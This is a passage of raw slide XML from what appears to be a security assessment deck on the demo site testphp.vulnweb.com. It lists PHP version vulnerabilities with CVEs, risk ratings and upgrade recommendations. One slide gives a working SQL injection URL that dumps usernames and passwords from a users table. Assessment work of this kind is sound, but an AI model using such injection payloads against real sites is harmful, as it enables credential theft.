              </a:rPr>
              <a:t>LOW</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0"/>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rPr lang="en-US"/>
              <a:t>OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="422" name="Google Shape;422;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="226421" y="1427891"/>
            <a:ext cx="11617235" cy="450452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1"/>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rPr lang="en-US"/>
              <a:t>INPUT AND RESULT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722812" y="1367246"/>
            <a:ext cx="10389325"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000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>Use this query:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arimo"/>
              <a:ea typeface="Arimo"/>
              <a:cs typeface="Arimo"/>
              <a:sym typeface="Arimo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/product.php?pic=-1 union select all 1,2,3,4,5,6,group_concat(uname,0x3a,pass),8,9,10,11 from users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Google Shape;429;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722812" y="4423954"/>
            <a:ext cx="1031094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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Result: We get the username and password of the website.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2"/>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rPr lang="en-US"/>
              <a:t>OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="435" name="Google Shape;435;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="748936" y="1542792"/>
            <a:ext cx="9562013" cy="4867152"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547333" y="927027"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>16. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.10 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="441" name="Google Shape;441;p53"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="365425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2236100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.2.10. Such versions are reportedly affected by multiple vulnerabilities :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Sufficient checks are not performed on fields reserved for offsets in function 'exif_read_data()'. (bug 48378)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:endParaRPr sz="1400"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Provided 'safe_mode_exec_dir' is not set (not set by default), it may be possible to bypass 'safe_mode' restrictions by preceding a backslash in functions such as 'exec()', 'system()', 'shell_exec()', 'passthru()' and 'popen()' on a system running PHP on Windows. (bug 45997)</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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65425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>               HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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780225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Successful exploitation of this issue by the attacker could result in a denial of service condition.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65425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1059275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>upgrade to PHP version 5.2.10 or later.</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442" name="Google Shape;442;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7228114" y="3944983"/>
            <a:ext cx="531223" cy="35705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443" name="Google Shape;443;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10937966" y="3944983"/>
            <a:ext cx="531223" cy="35705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444" name="Google Shape;444;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9178834" y="3944983"/>
            <a:ext cx="531223" cy="357051"/>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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625710" y="935736"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.10 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783771" y="1489165"/>
            <a:ext cx="9562012" cy="2177144"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608293" y="892193"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>17. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.12 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="456" name="Google Shape;456;p55"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="272505" y="1288868"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11647000"/>
              </a:tblGrid>
              <a:tr h="350525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2424525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.2.12. Such versions may be affected by several security issues :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- It is possible to bypass the 'safe_mode' configuration setting using 'tempnam()'. (CVE-2009-3557)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- It is possible to bypass the 'open_basedir' configuration setting using 'posix_mkfifo()'. (CVE-2009-3558)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Provided file uploading is enabled (it is by default), an attacker can upload files using a POST request with 'multipart/form-data' content even if the target script doesn't actually support file uploads per se. By supplying a large number (15,000+) of files, an attacker could cause the web server to stop responding while it processes the file list. (CVE-2009-4017)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Missing protection for '$_SESSION' from interrupt corruption and improved 'session.save_path' check.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>(CVE-2009-4143)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Insufficient input string validation in the 'htmlspecialchars()' function. (CVE-2009-4142)</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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50525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                               HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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794700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An attacker may leverage the cross-site scripting vulnerability to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>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50525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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697425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to upgrade to PHP version 5.2.12 or later.</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457" name="Google Shape;457;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7289074" y="4171406"/>
            <a:ext cx="566057" cy="374468"/>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458" name="Google Shape;458;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="4171406"/>
            <a:ext cx="566057" cy="374468"/>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459" name="Google Shape;459;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9370423" y="4171406"/>
            <a:ext cx="566057" cy="374468"/>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6"/>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rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.12 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1619794"/>
            <a:ext cx="10380617" cy="2473235"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
